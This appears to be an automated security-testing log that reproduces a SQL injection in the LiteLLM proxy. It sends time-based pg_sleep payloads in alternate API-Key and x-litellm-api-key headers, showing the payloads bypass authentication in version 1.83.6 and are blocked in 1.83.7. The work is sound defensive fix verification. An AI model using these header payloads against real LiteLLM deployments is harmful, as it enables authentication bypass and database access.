[+] LiteLLM SQL injection variant analysis: alternate authentication header sources [+] This script tests vulnerable litellm==1.83.6 and fixed litellm==1.83.7 side by side. [+] Cache directory: /data/pruva/project-cache/ea84d142-3b88-4e3b-ad6b-a004b7386804 [+] Reusing LiteLLM checkout at /data/pruva/project-cache/ea84d142-3b88-4e3b-ad6b-a004b7386804/repo [+] PostgreSQL binaries: /usr/lib/postgresql/18/bin [+] Starting PostgreSQL on 127.0.0.1:42085 [+] PostgreSQL is ready [+] Reusing database litellm_variant_vuln [+] Reusing database litellm_variant_fixed [+] Reusing venv litellm_vuln_1_83_6 with litellm==1.83.6 [+] Reusing venv litellm_fixed_1_83_7 with litellm==1.83.7 [+] Prisma schema already present in litellm_variant_vuln [+] Prisma schema already present in litellm_variant_fixed [+] Verified package delta and sort validation guardrails [+] Starting LiteLLM 1.83.6 on 127.0.0.1:58039 using DB litellm_variant_vuln [+] Waiting for LiteLLM proxy on port 58039........................................................................................ ready (HTTP 401) [+] Creating one valid virtual key through the running proxy [+] Candidate A: SQL payload supplied in API-Key header to vulnerable /model/info [+] Vulnerable API-Key candidate: time=2.014991s status=200 [+] Candidate B: SQL payload supplied in x-litellm-api-key header to vulnerable /model/info [+] Vulnerable x-litellm-api-key candidate: time=2.010438s status=200 [+] Starting LiteLLM 1.83.7 on 127.0.0.1:44117 using DB litellm_variant_fixed [+] Waiting for LiteLLM proxy on port 44117................................................................................................... ready (HTTP 401) [+] Creating one valid virtual key through the running proxy [+] Fixed check A: identical API-Key payload against fixed /model/info [+] Fixed API-Key candidate: time=0.019809s status=401 [+] Fixed check B: identical x-litellm-api-key payload against fixed /model/info [+] Fixed x-litellm-api-key candidate: time=0.010958s status=401 { "result": "alternate_trigger_blocked_by_fix", "exit_code_meaning": "exit 1 because the alternate header triggers work only on the vulnerable package and do not bypass the fixed package", "payloads": { "api_key_header": "' OR EXISTS(SELECT 1 FROM pg_sleep(2)) -- api-key", "x_litellm_api_key_header": "' OR EXISTS(SELECT 1 FROM pg_sleep(2)) -- x-litellm" }, "vulnerable_api_key_header": { "time_seconds": 2.014991, "http_code": "200" }, "vulnerable_x_litellm_header": { "time_seconds": 2.010438, "http_code": "200" }, "fixed_api_key_header": { "time_seconds": 0.019809, "http_code": "401" }, "fixed_x_litellm_header": { "time_seconds": 0.010958, "http_code": "401" }, "checks": { "vulnerable_api_key_header_delayed": true, "vulnerable_api_key_header_auth_bypassed": true, "vulnerable_x_litellm_header_delayed": true, "vulnerable_x_litellm_header_auth_bypassed": true, "fixed_api_key_header_rejected": true, "fixed_api_key_header_not_delayed": true, "fixed_x_litellm_header_rejected": true, "fixed_x_litellm_header_not_delayed": true, "postgres_saw_injected_sleep_in_vulnerable_query": true, "postgres_saw_fixed_parameterized_lookup": true } } [+] Variant stage completed: alternate header triggers are blocked by the fixed version; no fixed-version bypass confirmed. [+] Wrote runtime manifest { "entrypoint_kind": "endpoint", "entrypoint_detail": "GET /model/info authenticated with alternate API-Key and x-litellm-api-key headers instead of Authorization Bearer", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "postgresql", "litellm-proxy" ], "variant_stage_result": "alternate_trigger_blocked_by_fix", "proof_artifacts": [ "logs/vuln_variant/reproduction_steps.log", "logs/vuln_variant/fixed_version.txt", "logs/vuln_variant/source_delta_variant.txt", "logs/vuln_variant/postgres_variant.log", "logs/vuln_variant/vulnerable_api_key_header.txt", "logs/vuln_variant/fixed_api_key_header.txt", "logs/vuln_variant/vulnerable_x_litellm_header.txt", "logs/vuln_variant/fixed_x_litellm_header.txt", "vuln_variant/result.json" ], "notes": "The alternate header sources reach the same combined_view token lookup in the vulnerable package, but the fixed package parameterizes that sink, so no fixed-version bypass is confirmed." }